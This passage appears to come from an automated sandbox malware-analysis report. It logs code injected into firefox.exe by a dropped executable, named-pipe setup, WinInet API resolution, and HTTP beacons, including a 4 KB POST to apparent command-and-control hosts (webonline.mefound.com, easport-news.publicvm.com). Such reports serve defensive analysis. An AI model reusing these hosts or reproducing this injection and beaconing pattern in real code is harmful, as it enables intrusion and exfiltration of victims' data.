| index.dat | 0x00350000 | 0x00357fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x00360000 | 0x0036ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory | Readable, Writable |
|
|
|
- |
| index.dat | 0x00380000 | 0x003abfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x004a7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x005b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x005c0000 | 0x0088efff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x00890fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000008a0000 | 0x008a0000 | 0x008a0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x008b6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000008c0000 | 0x008c0000 | 0x008c1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| urlmon.dll.mui | 0x008d0000 | 0x008d7fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000008f0000 | 0x008f0000 | 0x009effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000009f0000 | 0x009f0000 | 0x00b2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000009f0000 | 0x009f0000 | 0x00a7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000af0000 | 0x00af0000 | 0x00b2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000b90000 | 0x00b90000 | 0x00c8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000c90000 | 0x00c90000 | 0x00d8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000db0000 | 0x00db0000 | 0x00eaffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000eb0000 | 0x00eb0000 | 0x00fdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000eb0000 | 0x00eb0000 | 0x00faffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000fd0000 | 0x00fd0000 | 0x00fdffff | Private Memory | Readable, Writable |
|
|
|
- |
| firefox.exe | 0x01050000 | 0x01093fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x00000000010a0000 | 0x010a0000 | 0x01c9ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001ca0000 | 0x01ca0000 | 0x01e4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01e3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001e40000 | 0x01e40000 | 0x01e4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01f9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002000000 | 0x02000000 | 0x020fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002200000 | 0x02200000 | 0x0223ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022b0000 | 0x022b0000 | 0x023affff | Private Memory | Readable, Writable |
|
|
|
- |
| msvcr100.dll | 0x6cd50000 | 0x6ce0dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| npmproxy.dll | 0x6efd0000 | 0x6efd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x6f850000 | 0x6f855fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netprofm.dll | 0x70600000 | 0x70659fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sensapi.dll | 0x72d70000 | 0x72d75fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x73730000 | 0x73744fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x73750000 | 0x737a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x73fe0000 | 0x74017fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x74120000 | 0x74126fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x74130000 | 0x7414bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x74240000 | 0x7424ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x74550000 | 0x74570fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rtutils.dll | 0x74650000 | 0x7465cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winrnr.dll | 0x74880000 | 0x74887fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pnrpnsp.dll | 0x74890000 | 0x748a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| napinsp.dll | 0x748c0000 | 0x748cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x74eb0000 | 0x7504dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x75420000 | 0x75428fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wshtcpip.dll | 0x754b0000 | 0x754b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x75740000 | 0x7577afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x75820000 | 0x75863fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wship6.dll | 0x75950000 | 0x75955fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x75960000 | 0x7599bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x759a0000 | 0x759b5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75e00000 | 0x75e1afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75e20000 | 0x75e2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrtremote.dll | 0x75ec0000 | 0x75ecdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x75ed0000 | 0x75edafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x75f40000 | 0x75f4bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x76050000 | 0x7616cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x763a0000 | 0x763e4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x763f0000 | 0x765eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76600000 | 0x766f4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x77600000 | 0x77682fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x77690000 | 0x7771efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x77830000 | 0x77965fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #8: c:\windows\system32\gorctexxzx.exe | 0xecc | address = 0x150000, size = 14348 |
|
1 | |
| Create Remote Thread | #8: c:\windows\system32\gorctexxzx.exe | 0xecc | address = 0x150202 |
|
1 |
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Pipe | \device\namedpipe\c41b2304 | open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_READMODE_MESSAGE, PIPE_TYPE_MESSAGE, max_instances = 1 |
|
1 | |
| Read | - | size = 65535, size_out = 132 |
|
1 | |
| Read | - | size = 65535, size_out = 4271 |
|
1 | |
| Read | - | size = 65535, size_out = 8 |
|
1 | |
| Write | - | size = 13 |
|
1 | |
| Write | - | size = 308 |
|
1 |
Module (55)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | WinInet.dll | base_address = 0x76600000 |
|
1 | |
| Load | urlmon.dll | base_address = 0x77830000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = realloc, address_out = 0x7772b10d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = sprintf, address_out = 0x7773d354 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = srand, address_out = 0x7772f757 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = rand, address_out = 0x7772c070 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _vsnprintf, address_out = 0x7772d1a8 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strtok, address_out = 0x7772df1f |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strcmp, address_out = 0x77738b11 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateNamedPipeW, address_out = 0x7620270f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileW, address_out = 0x7621cc56 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetNamedPipeHandleState, address_out = 0x7622f420 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetEvent, address_out = 0x7621bccc |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetOverlappedResult, address_out = 0x76212f04 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ConnectNamedPipe, address_out = 0x76202727 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushFileBuffers, address_out = 0x76207f81 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DisconnectNamedPipe, address_out = 0x7622f438 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OpenEventW, address_out = 0x7621548b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ResetEvent, address_out = 0x7621bcb4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTime, address_out = 0x7621ced8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ExitProcess, address_out = 0x7622214f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetLastError, address_out = 0x7621bb08 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OutputDebugStringA, address_out = 0x7620eb36 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpSendRequestExA, address_out = 0x76691812 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpQueryInfoA, address_out = 0x7661a33e |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetConnectA, address_out = 0x766249e9 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetReadFile, address_out = 0x7661b406 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetWriteFile, address_out = 0x766346da |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpOpenRequestA, address_out = 0x76624c7d |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpEndRequestA, address_out = 0x766345ea |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpAddRequestHeadersA, address_out = 0x7661dcd2 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpSendRequestA, address_out = 0x766918f8 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetOpenA, address_out = 0x7662f18e |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetCloseHandle, address_out = 0x7661ab49 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetQueryOptionA, address_out = 0x76611b56 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetSetOptionA, address_out = 0x766175e8 |
|
1 | |
| Get Address | c:\windows\system32\urlmon.dll | function = ObtainUserAgentString, address_out = 0x77861d76 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = CRH2YWU7 |
|
2 | |
| Get Time | type = System Time, time = 2018-04-29 13:07:14 (UTC) |
|
1 |
Network Behavior
HTTP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 975 bytes |
| Total Data Received | 4.40 KB |
| Contacted Host Count | 2 |
| Contacted Hosts | webonline.mefound.com, easport-news.publicvm.com |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | webonline.mefound.com |
| Server Port | 0 |
| Data Sent | 443 |
| Data Received | 4 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = webonline.mefound.com, server_port = 0 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = index/index.php?h=8NavN1UHP1o%3d&d=8Naq1O4ZqFrw16AGYzEOb8jkmgBlNA9uwOavN1UHP1rw1q83VQd%3d, accept_types = 0, flags = INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE |
|
1 | |
| Add HTTP Request Headers | headers = Accept: */* |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = webonline.mefound.com/index/index.php?h=8NavN1UHP1o%3d&d=8Naq1O4ZqFrw16AGYzEOb8jkmgBlNA9uwOavN1UHP1rw1q83VQd%3d |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Close Session | - |
|
2 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | easport-news.publicvm.com |
| Server Port | 0 |
| Data Sent | 532 |
| Data Received | 4500 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = easport-news.publicvm.com, server_port = 0 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP/1.1, target_resource = index/index.php?h=O2i1voZ4%2bOQ%3d&d=OWiwXT1mb%2bQ7abqPsE7J0QNagIm2S8jQC1i1voZ4%2bOQ7aLW%2bhnjJ0g1ZgIa0Tc%2fUCFiBjrY8ydYJXYGHtEHI0BUCxdmmWNjEG0iVnqZY2MQbSJWepljYxM%3d%3d, accept_types = 0, flags = INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE |
|
1 | |
| Add HTTP Request Headers | headers = Content-Type: multipart/form-data; boundary=---------------------------4153125a70a8a99 |
|
1 | |
| Send HTTP Request | url = easport-news.publicvm.com/index/index.php?h=O2i1voZ4%2bOQ%3d&d=OWiwXT1mb%2bQ7abqPsE7J0QNagIm2S8jQC1i1voZ4%2bOQ7aLW%2bhnjJ0g1ZgIa0Tc%2fUCFiBjrY8ydYJXYGHtEHI0BUCxdmmWNjEG0iVnqZY2MQbSJWepljYxM%3d%3d |
|
1 | |
| Add HTTP Request Data | size = 134, size_out = 134 |
|
1 | |
| Add HTTP Request Data | size = 4004, size_out = 4004 |
|
1 | |
| Add HTTP Request Data | size = 50, size_out = 50 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 16384, size_out = 304 |
|
1 | |
| Read Response | size = 16384, size_out = 0 |
|
1 | |
| Close Session | - |
|
2 |
Process #77: firefox.exe
64
22
| Information | Value |
|---|---|
| ID | #77 |
| File Name | c:\program files\mozilla firefox\firefox.exe |
| Command Line | "c:\program files\mozilla firefox\firefox.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:33, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x840 |
| Parent PID | 0xaac (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
248
0x
850
0x
860
0x
6A4
0x
870
0x
880
0x
890
0x
8C0
0x
300
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00042fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00053fff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00060000 | 0x000c6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| windowsshell.manifest | 0x000f0000 | 0x000f0fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00101fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| index.dat | 0x00110000 | 0x00117fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| firefox.exe | 0x00120000 | 0x00163fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| index.dat | 0x00170000 | 0x0019bfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x001a0000 | 0x001affff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000200000 | 0x00200000 | 0x00201fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| urlmon.dll.mui | 0x00210000 | 0x00217fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0023ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00647fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000006e0000 | 0x006e0000 | 0x0071ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x00820fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000830000 | 0x00830000 | 0x0142ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001430000 | 0x01430000 | 0x014fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001590000 | 0x01590000 | 0x0159ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x015a0000 | 0x0186efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001900000 | 0x01900000 | 0x019fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001a00000 | 0x01a00000 | 0x01c1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001a60000 | 0x01a60000 | 0x01b5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001be0000 | 0x01be0000 | 0x01c1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001c40000 | 0x01c40000 | 0x01d3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01e0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001e70000 | 0x01e70000 | 0x01f6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001ff0000 | 0x01ff0000 | 0x020effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000020f0000 | 0x020f0000 | 0x021effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000021f0000 | 0x021f0000 | 0x022effff | Private Memory | Readable, Writable |
|
|
|
- |
